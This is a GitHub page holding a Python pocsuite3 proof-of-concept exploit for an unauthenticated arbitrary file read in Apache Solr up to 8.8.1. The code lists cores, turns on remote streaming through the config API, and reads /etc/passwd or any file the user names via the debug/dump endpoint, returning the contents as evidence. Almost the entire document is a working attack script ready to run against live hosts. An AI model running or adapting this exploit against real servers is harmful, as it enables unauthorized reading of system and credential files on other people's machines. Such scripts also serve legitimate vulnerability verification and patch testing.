-
Notifications
You must be signed in to change notification settings - Fork 1
/
solr_all_readfile.py
113 lines (107 loc) · 5.34 KB
/
solr_all_readfile.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
#!/usr/bin/env python
# coding: utf-8
from urllib.parse import urlparse,quote
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from collections import OrderedDict
from pocsuite3.api import OptString
from pocsuite3.api import POC_CATEGORY, VUL_TYPE
import json
class TestPOC(POCBase):
vulID = 'ssvid-99160'
version = '1'
author = 'kingween'
vulDate = '2021-3-18'
createDate = '2021-3-19'
updateDate = '2021-3-19'
references = [
'https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ']
name = 'solr未授权导致任意文件读取'
appPowerLink = ''
appName = 'solr'
appVersion = 'Apache Solr <= 8.8.1'
vulType = VUL_TYPE.CODE_EXECUTION
category = POC_CATEGORY.EXPLOITS.REMOTE
desc = '''
Apache Solr未授权导致任意文件读取
'''
def _options(self):
o = OrderedDict()
o["filename"] = OptString('', description='文件路径', require=False)
return o
def _verify(self):
result = {}
pr = urlparse(self.url)
if pr.port:
ports = [pr.port]
else:
ports = [8983]
for port in ports:
target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
# 获取core
url1 = target + '/solr/admin/cores?indexInfo=false&wt=json'
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:73.0) Gecko/20100101 Firefox/73.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": self.url, "Upgrade-Insecure-Requests": "1"}
response = req.get(url1, headers=headers,timeout=5)
core_name = list(json.loads(response.text)["status"])[0]
# 开启equestDispatcher.requestParsers.enableRemoteStreaming
url2 = target + "/solr/" + core_name + "/config"
headers = {"Content-type":"application/json"}
data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
response = req.get(url2, data=data,headers=headers, timeout=5)
if 'responseHeader' in response.text and response.status_code == 200:
# 读取文件
url3 = target + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = 'stream.url=file:///etc/passwd'
response = req.get(url3, data=data, headers=headers, timeout=5)
if 'No such file or directory' not in response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
break
return self.parse_output(result)
def _attack(self):
result = {}
pr = urlparse(self.url)
if pr.port:
ports = [pr.port]
else:
ports = [8983]
for port in ports:
target = '{}://{}:{}'.format(pr.scheme, pr.hostname, port)
# 获取core
url1 = target + '/solr/admin/cores?indexInfo=false&wt=json'
headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:73.0) Gecko/20100101 Firefox/73.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": self.url, "Upgrade-Insecure-Requests": "1"}
response = req.get(url1, headers=headers, timeout=10)
core_name = list(json.loads(response.text)["status"])[0]
# 开启equestDispatcher.requestParsers.enableRemoteStreaming
url2 = target + "/solr/" + core_name + "/config"
headers = {"Content-type":"application/json"}
data = '{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'
response = req.get(url2, data=data,headers=headers, timeout=5)
if 'responseHeader' in response.text and response.status_code == 200:
# 读取文件
filename = self.get_option("filename")
url3 = target + "/solr/{}/debug/dump?param=ContentStreams".format(core_name)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = 'stream.url=file://{}'.format(filename)
response = req.get(url3, data=data, headers=headers, timeout=5)
if 'No such file or directory' not in response.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
result['extra'] = {}
result['extra']['evidence'] = response.text
break
return self.parse_output(result)
def _shell(self):
return self._verify
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('not vulnerability')
return output
register_poc(TestPOC)